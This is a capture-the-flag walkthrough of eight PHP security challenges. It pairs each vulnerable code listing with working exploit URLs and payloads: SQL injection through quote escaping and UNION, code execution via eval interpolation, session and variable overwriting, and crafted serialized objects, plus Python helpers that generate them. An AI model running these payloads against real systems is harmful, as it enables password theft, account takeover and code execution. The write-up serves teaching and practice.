php4fun.sinaapp.com PHP Challenge Walkthrough
challenge 1
php code:
#!php
#GOAL: get password from admin;
error_reporting(0);
require 'db.inc.php';
function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str);
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
$row = mysql_fetch_assoc($result);
echo "Hello ".$row['name']."</br>";
echo "Your password is:".$row['pass']."</br>";
Walkthrough:
For a MySQL injection inside a single-quoted literal the whole game is getting past the quote: either produce one of your own (htmlentities() with ENT_QUOTES turns ' into &#039;, so that is not going to happen) or... eat one that is already there. clean() never touches backslashes, and with magic_quotes_gpc on it even strips the escaping that would have neutralised them. A username of admin\ therefore produces name='admin\' AND pass='..., where the backslash escapes the quote that should have closed the name literal; the literal now runs on to the quote that was meant to open the pass literal, and the password value is parsed as bare SQL. With a password of " or 1#" the statement becomes SELECT * FROM users WHERE name='admin\' AND pass=' or 1#';, which MySQL reads as WHERE <literal> or 1 with the rest commented out, so every row matches and the first one fetched is admin.
So:
http://php4fun.sinaapp.com/c1/index.php?username=admin\&password=%20or%201%23
challenge 2
php code:
#!php
#GOAL: gather some phpinfo();
$str=@(string)$_GET['str'];
eval('$str="'.addslashes($str).'";');
Walkthrough:
eval('$str="'.addslashes($str).'";') ends up executing PHP code of the form $str="...";. addslashes() escapes the double quotes, so the literal cannot be closed early, but the content still sits inside a double-quoted PHP string, and those are interpolated: ${expr} is evaluated while the string is built, so ${${ code here }} runs the code before the assignment even completes. addslashes() leaves $, { and } alone.
So:
http://phpchallenges2.sinaapp.com/index.php?str=${${phpinfo()}}
challenge 3
php code:
#!php
# GOAL: dump the info for the secret id
require 'db.inc.php';
$id = @(float)$_GET['id'];
$secretId = 1;
if($id == $secretId){
echo 'Invalid id ('.$id.').';
}
else{
$query = 'SELECT * FROM users WHERE id = \''.$id.'\';';
$result = mysql_query($query);
$row = mysql_fetch_assoc($result);
echo "id: ".$row['id']."</br>";
echo "name:".$row['name']."</br>";
}
Walkthrough:
This relies on PHP and MySQL handling floats at different precision: the side with less precision silently drops the digits it cannot hold. (float)'1.0000000000001' is a double in PHP, still distinct from 1, so the == guard lets it through, while on the MySQL side the trailing digits are lost and id = '1.0000000000001' still matches the row with id 1. A second route exists as well: PHP converts floats to strings with `precision` significant digits (14 by default), so an id with even more zeros is unequal to 1 as a double but is interpolated into the query as plain 1.
So:
http://php4fun.sinaapp.com/c3/index.php?id=1.0000000000001
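Added Python example, not from the original page, modelling the two sides of the challenge 3 comparison: PHP's side as a double followed by its precision-limited float-to-string conversion, and MySQL's side as a single-precision value, which is an assumption about the id column taken from the walkthrough's explanation rather than something the page confirms. shortest_bypass() searches for the shortest id that passes the PHP guard and still matches id 1.

```python
import struct
from typing import Optional

SECRET_ID = 1
PHP_PRECISION = 14   # PHP's default `precision` ini: significant digits kept when a float becomes a string


def to_float32(x: float) -> float:
    """Round a double to IEEE single precision.  This models the MySQL side of the
    comparison as a FLOAT column (an assumption taken from the walkthrough)."""
    return struct.unpack("<f", struct.pack("<f", x))[0]


def php_side(id_param: str) -> Optional[str]:
    """Model the PHP code: (float) cast, $id == $secretId, then interpolation of
    $id into the query.  Returns the text that reaches MySQL, or None when the
    guard rejects the id."""
    id_float = float(id_param)
    if id_float == SECRET_ID:            # double comparison, exact
        return None
    return "%.*G" % (PHP_PRECISION, id_float)


def mysql_side(literal: str) -> bool:
    """Does id = '<literal>' still match the row with id 1 at single precision?"""
    return to_float32(float(literal)) == to_float32(float(SECRET_ID))


def bypasses(id_param: str) -> bool:
    literal = php_side(id_param)
    return literal is not None and mysql_side(literal)


def shortest_bypass(secret_id: int = SECRET_ID) -> str:
    """Smallest number of zeros after the decimal point that passes both sides."""
    for zeros in range(20):
        candidate = f"{secret_id}.{'0' * zeros}1"
        if bypasses(candidate):
            return candidate
    raise RuntimeError("no bypass found within 20 digits")


if __name__ == "__main__":
    for cand in ("1", "1.1", "1.00000001", "1.0000000000001", "1.00000000000001"):
        print(f"{cand:>17} -> to MySQL: {php_side(cand)!s:>17}  bypass: {bypasses(cand)}")
    print("shortest:", shortest_bypass())
```

The table printed by the script shows both routes: 1.0000000000001 survives PHP's string conversion and is rounded away on the MySQL side, while 1.00000000000001 is already printed as 1 by PHP before it reaches the query.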
challenge 4
php code:
#!php
#GOAL:get password from admin
# $yourInfo=array(
# 'id' => 1,
# 'name' => 'admin',
# 'pass' => 'xxx',
# 'level' => 1
# );
require 'db.inc.php';
$_CONFIG['extraSecure']=true;
//if register globals = on, undo var overwrites
foreach(array('_GET','_POST','_REQUEST','_COOKIE') as $method){
foreach($$method as $key=>$value){
unset($$key);
}
}
$kw = isset($_GET['kw']) ? trim($_GET['kw']) : die('Please enter in a search keyword.');
if($_CONFIG['extraSecure']){
$kw=preg_replace('#[^a-z0-9_-]#i','',$kw);
}
$query = 'SELECT * FROM messages WHERE message LIKE \'%'.$kw.'%\';';
$result = mysql_query($query);
$row = mysql_fetch_assoc($result);
echo "id: ".$row['id']."</br>";
echo "message: ".$row['message']."</br>";
Walkthrough:
$kw sits inside single quotes, so it looks as if all we need is a usable single quote, i.e. to get rid of $_CONFIG['extraSecure'] so that the preg_replace() filter never runs. Conveniently, the superfluous "undo register_globals" loop at the top does unset($$key) for every request parameter name, so a parameter called _CONFIG unsets the $_CONFIG array itself (how else would the level be solvable?); $_CONFIG['extraSecure'] is then null and the filter is skipped. From there it is an ordinary UNION query: and 0 discards the real messages rows, union select name,pass from users where id=1 supplies admin's name and password as the id and message columns the page echoes, and # comments out the trailing %'.
So:
http://php4fun.sinaapp.com/c4/index.php?kw='%20and%200%20union%20select%20name,pass%20from%20users%20where%20id=1%23&_CONFIG=aaa
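The quoting tricks from challenge 1 (the escaped closing quote) and challenge 4 (the filter that disappears once $_CONFIG is unset) can be checked without a MySQL server. The following is an added Python example, not code from the original page: it models clean() and the extraSecure filter, builds the same statements, and re-scans them with a deliberately simplified MySQL-style lexer in which a backslash inside a single-quoted literal escapes the next character and # starts a comment. effective_sql() returns what MySQL would actually parse as SQL, with every string literal collapsed to '?'; the function names and the lexer are this example's own simplifications.

```python
import re

# Payloads from the walkthrough, URL-decoded
C1_USERNAME, C1_PASSWORD = "admin\\", " or 1#"
C4_KW = "' and 0 union select name,pass from users where id=1#"


def php_clean(s: str) -> str:
    """Model clean() from challenge 1: htmlentities($str, ENT_QUOTES).
    Quotes become entities, but a backslash passes through untouched."""
    return (s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
             .replace('"', "&quot;").replace("'", "&#039;"))


def php_extra_secure(kw: str) -> str:
    """Model preg_replace('#[^a-z0-9_-]#i', '', $kw) from challenge 4."""
    return re.sub(r"[^a-z0-9_-]", "", kw, flags=re.IGNORECASE)


def challenge1_query(username: str, password: str) -> str:
    return f"SELECT * FROM users WHERE name='{php_clean(username)}' AND pass='{php_clean(password)}';"


def challenge4_query(kw: str, extra_secure: bool = True) -> str:
    """extra_secure=False is the state after ?_CONFIG=... has unset $_CONFIG."""
    if extra_secure:
        kw = php_extra_secure(kw)
    return f"SELECT * FROM messages WHERE message LIKE '%{kw}%';"


def effective_sql(query: str) -> str:
    """Re-scan a statement the way MySQL's lexer does, collapsing each
    single-quoted literal to '?' and dropping # / -- comments, so that only
    the text MySQL treats as SQL remains.  Inside a literal a backslash
    escapes the following character (the behaviour challenge 1 abuses).
    Simplified on purpose: '' doubling and double-quoted strings are ignored."""
    out, i, n = [], 0, len(query)
    while i < n:
        c = query[i]
        if c == "'":
            i += 1
            while i < n and query[i] != "'":
                i += 2 if query[i] == "\\" else 1   # backslash eats the next char
            out.append("'?'")
            i += 1                                   # closing quote
        elif c == "#" or query.startswith("-- ", i):
            break                                    # comment runs to end of statement
        else:
            out.append(c)
            i += 1
    return "".join(out).rstrip()


if __name__ == "__main__":
    for q in (challenge1_query("admin", "x' or 1#"),
              challenge1_query(C1_USERNAME, C1_PASSWORD),
              challenge4_query(C4_KW, extra_secure=True),
              challenge4_query(C4_KW, extra_secure=False)):
        print(q)
        print("  ->", effective_sql(q))
```

Run it and compare the two challenge 1 lines: the benign password stays inside its literal, while admin\ moves the password into SQL context. For challenge 4 the same payload collapses to a harmless LIKE pattern with the filter on and to a UNION with it off.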
challenge 5
php code:
#!php
# GOAL: overwrite password for admin (id=1)
# Try to login as admin
# $yourInfo=array( //this is your user data in the db
# 'id' => 8,
# 'name' => 'jimbo18714',
# 'pass' => 'MAYBECHANGED',
# 'level' => 1
# );
require 'db.inc.php';
function mres($str) {
return mysql_real_escape_string($str);
}
$userInfo = @unserialize($_GET['userInfo']);
$query = 'SELECT * FROM users WHERE id = \''.mres($userInfo['id']).'\' AND pass = \''.mres($userInfo['pass']).'\';';
$result = mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
$row = mysql_fetch_assoc($result);
foreach($row as $key => $value){
$userInfo[$key] = $value;
}
$oldPass = @$_GET['oldPass'];
$newPass = @$_GET['newPass'];
if($oldPass == $userInfo['pass']){
$userInfo['pass'] = $newPass;
$query = 'UPDATE users SET pass = \''.mres($newPass).'\' WHERE id = \''.mres($userInfo['id']).'\';';
mysql_query($query);
echo 'Password Changed.';
}
else{
echo 'Invalid old password entered.';
}
Walkthrough:
(1) http://www.80vul.com/webzul/webzine_0x06/PSTZine_0x06_0x03.txt (the password the site shows by default is itself a hint... presumably some expert changed it in passing) (2) $userInfo['pass'] = $newPass; //this line: make it write 1 into the id as well
The row fetched from the database is copied back over $userInfo, so a plain serialized array cannot smuggle a foreign id into the UPDATE. A serialized reference can: if the 'pass' element is an R: reference to the 'id' element, the two are one variable. The SELECT then requires your id and password to be the same value, which is why your own password has to become "8" first; once logged in, $userInfo['pass'] = $newPass also rewrites $userInfo['id'], and the UPDATE runs with WHERE id = '1' and newPass = 1.
So:
(1) Change jimbo18714's password to 8 (2) Change the password again, this time submitting userInfo as the serialized array for id 8 with pass referencing id, oldPass=8 and newPass=1
challenge 6
php code:
#!php
#GOAL: get the secret;
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "?????????????????????????????";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}
Walkthrough:
Serialize a just4fun object, assigning $o->enter before serializing (this works locally but not on php4fun.sinaapp.com; was the code changed?). The likely reason is that the question marks in the published source are only a placeholder for the real secret, so a payload that hard-codes them matches a local copy and nothing else. A payload that works whatever the secret is makes enter a serialized reference (R:) to secret: the server's $o->secret = "..." then writes through to enter and the === check holds.
So:
(1) Generate the serialized object
#!php
class just4fun {
var $enter;
var $secret;
}
$a=new just4fun();
$a->enter='?????????????????????????????';
echo urlencode(serialize($a));
(2)
link?pass=O%3A8%3A%22just4fun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3Bs%3A29%3A%22%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%22%3Bs%3A6%3A%22secret%22%3BN%3B%7D
challenge 7
php code:
#!php
# GOAL: get the key from $hidden_password[207]
session_start();
error_reporting(0);
function auth($password, $hidden_password) {
$res = 0;
if(isset($password) && $password != "") {
if($password == $hidden_password) {
$res = 1;
}
}
$_SESSION["logged"] = $res;
return $res;
}
function display($res){
$aff = htmlentities($res);
return $aff;
}
if(!isset($_SESSION["logged"]))
$_SESSION["logged"] = 0;
$aff = "";
include("config.inc.php");
foreach($_REQUEST as $request) {
if(is_array($request)) {
die("Can not use Array in request!");
}
}
$password = $_POST["password"];
if(!ini_get("register_globals")) {
$superglobals = array($_POST, $_GET);
if(isset($_SESSION)) {
array_unshift($superglobals, $_SESSION);
}
foreach($superglobals as $superglobal) {
extract($superglobal, 0);
}
}
if((isset($password) && $password != "" && auth($password, $hidden_password[207]) == 1) || (is_array($_SESSION) && $_SESSION["logged"] == 1)) {
$aff = display("$hidden_password[207]");
} else {
$aff = display("Try again");
}
echo $aff;
Walkthrough:
"get the key from $hidden_password[207]" is a bit vague; the request below gets the key by getting around the check that rejects arrays in $_REQUEST. The key is shown whenever is_array($_SESSION) && $_SESSION["logged"] == 1, and extract() is run over $_SESSION, $_POST and $_GET in that order with EXTR_OVERWRITE, so a GET parameter named _SESSION replaces the real session array with one we control. The array check would reject _SESSION[logged]=1 on its own, but $_REQUEST is built with POST entries overriding GET ones, so also sending a scalar _SESSION=1 in the POST body leaves $_REQUEST['_SESSION'] a plain string while $_GET['_SESSION'] stays an array, and $_GET is extracted last.
So:
http://php4fun.sinaapp.com/c7/index.php?_SESSION[logged]=1
POST: _SESSION=1
challenge 8
php code:
#!php
#GOAL: file_get_content('sbztz.php') : )
class just4fun {
public $filename;
function __toString() {
return @file_get_contents($this->filename);
}
}
$data = stripslashes($_GET['data']);
if (!$data) {
die("hello from y");
}
$token = $data[0];
$pass = true;
switch ( $token ) {
case 'a' :
case 'O' :
case 'b' :
case 'i' :
case 'd' :
$pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
break;
default:
$pass = false;
}
if (!$pass) {
die("TKS L.N.");
}
echo unserialize($data);
Walkthrough:
http://zone.wooyun.org/content/6697
The gate only looks at the first character and then insists that the length field after it is not purely digits (^O:[0-9]+:), but the unserialize() the challenge runs on also accepts a signed length such as O:+8:, so the object is still built; echo on it triggers __toString(), which file_get_contents()s the filename from the payload.
So:
(1) Build the data:
O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D (note the %2B: a literal + in the query string would be decoded as a space)
(2)
http://php4fun.sinaapp.com/c8/index.php?data=O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D
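Challenges 5, 6 and 8 all come down to writing a serialized PHP value by hand, and the interesting parts (the R: reference, the + in the length field) are exactly what serialize() will not emit for you. This is an added Python example, not code from the page: a small serializer for the subset of PHP's format these payloads need, with helper classes PHPObject and Ref of this example's own design and slot numbering modelled on PHP's unserialize() (slot 1 is the outermost value, every later value takes the next number, keys are not counted), plus a model of challenge 8's filter and the percent-encoding that keeps the + intact.

```python
import re
from urllib.parse import quote


class PHPObject:
    """Object to serialise: class name plus ordered public properties.
    plus_length=True writes the class-name length as '+8' instead of '8'
    (challenge 8).  Helper of this example, not a PHP construct."""
    def __init__(self, cls, props, plus_length=False):
        self.cls, self.props, self.plus_length = cls, props, plus_length


class Ref:
    """Serialised reference 'R:<slot>;' to an earlier value.  Slot 1 is the
    outermost value; every later value (not keys) takes the next slot number
    in serialisation order, mirroring PHP's unserialize() bookkeeping."""
    def __init__(self, slot):
        self.slot = slot


def php_serialize(v) -> str:
    """Subset of PHP serialize(): null, bool, int, str, array (dict), object, reference."""
    if isinstance(v, Ref):
        return f"R:{v.slot};"
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode())}:"{v}";'
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return f"a:{len(v)}:{{{body}}}"
    if isinstance(v, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.props.items())
        n = f"+{len(v.cls)}" if v.plus_length else str(len(v.cls))
        return f'O:{n}:"{v.cls}":{len(v.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(v).__name__}")


def challenge5_payload(my_id: int) -> str:
    """userInfo for challenge 5: 'id' lands in slot 2 and 'pass' references it,
    so both read my_id in the SELECT and both become $newPass after
    $userInfo['pass'] = $newPass, which is what moves the UPDATE to id=1."""
    return php_serialize({"id": str(my_id), "pass": Ref(2)})


def challenge6_payload(secret_guess=None) -> str:
    """pass for challenge 6.  With a guess, reproduce the page's payload that
    hard-codes the secret into enter.  Without one, make enter a reference to
    secret (slot 2), so it equals whatever the server assigns to $o->secret."""
    if secret_guess is not None:
        return php_serialize(PHPObject("just4fun", {"enter": secret_guess, "secret": None}))
    return php_serialize(PHPObject("just4fun", {"secret": None, "enter": Ref(2)}))


def challenge8_payload(filename: str = "sbztz.php") -> str:
    """data for challenge 8: an object whose class-name length is written as +8."""
    return php_serialize(PHPObject("just4fun", {"filename": filename}, plus_length=True))


def challenge8_filter_passes(data: str) -> bool:
    """Model the gate in challenge 8: first byte must be a known type letter and
    the regex ^<token>:[0-9]+: must NOT match for the payload to go through."""
    token = data[:1]
    if token not in ("a", "O", "b", "i", "d"):
        return False
    return re.match(rf"^{token}:[0-9]+:", data, flags=re.S) is None


def url_param(payload: str) -> str:
    """Percent-encode everything, so '+' travels as %2B and is not decoded to a space."""
    return quote(payload, safe="")


if __name__ == "__main__":
    print("c5 userInfo:", url_param(challenge5_payload(8)))
    print("c6 pass    :", url_param(challenge6_payload()))
    c8 = challenge8_payload()
    print("c8 data    :", url_param(c8), "passes filter:", challenge8_filter_passes(c8))
```

challenge6_payload('?' * 29) reproduces the page's hard-coded payload; challenge6_payload() is the reference form that holds whatever the secret is. Whether a given PHP version still accepts a + in the length field should be checked against that version's unserialize().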